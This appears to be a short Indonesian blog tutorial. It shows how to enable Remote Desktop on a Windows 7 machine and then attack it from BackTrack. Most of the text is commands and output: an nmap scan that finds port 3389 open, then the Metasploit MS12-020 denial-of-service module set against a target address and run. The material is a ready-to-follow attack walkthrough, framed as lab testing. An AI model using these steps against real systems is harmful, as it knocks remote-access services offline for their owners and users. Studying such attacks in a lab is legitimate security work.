Exploitasi BUG for Windows 7 Port: 3389

chmood

Persiapan pada Windows 7:

Sebelum melakukan pengujian port 3389 pada windows 7 ada beberapa langkah yang perlu dipersiapkan, yaitu: mengaktifkan system Remote pada windows 7.


Klik Logo Windows klik kanan pada computer pilih Properties


Pilih pada sebelah kiri Remote Setting kemudian akan muncul pop up dan pilih tab menu remote lalu centang yang tengah pada Remote Desktop dan pilih Apply OK.


Selanjutnya pada BackTrack lakukan langkah berikut:

root@bt:~# nmap -sS -v -o [Ip Target]
Starting Nmap 6.01 ( http://nmap.org ) at 2012-11-17 12:44 WIT
Nmap scan report for
Host is up (0.00038s latency).
Not shown: 990 filtered ports
PORT STATE SERVICE
443/tcp open https
465/tcp open smtps
563/tcp open snews
636/tcp open ldapssl
992/tcp open telnets
993/tcp open imaps
995/tcp open pop3s
3389/tcp open ms-wbt-server
8080/tcp open http-proxy
9000/tcp open cslistener
MAC Address: 54:04:A6:4B:75:E0 (Asustek Computer)
Nmap done: 1 IP address (1 host up) scanned in 9.67 seconds

root@bt:~# msfconsole
msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > set rport 3389
rport => 3389
msf auxiliary(ms12_020_maxchannelids) > set rhost [Ip Target]
rhost => 192.168.77.108
msf auxiliary(ms12_020_maxchannelids) > show options
Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):

Name Current Setting Required Description
—- ————— ——– ———–
RHOST 000.000.00.000 yes The target address
RPORT 3389 yes The target port

msf auxiliary(ms12_020_maxchannelids) > exploit


Proses Membuka tools Metasploit lewat terminal dan proses Scanning Port 3389


Proses Exploitasi


Komentar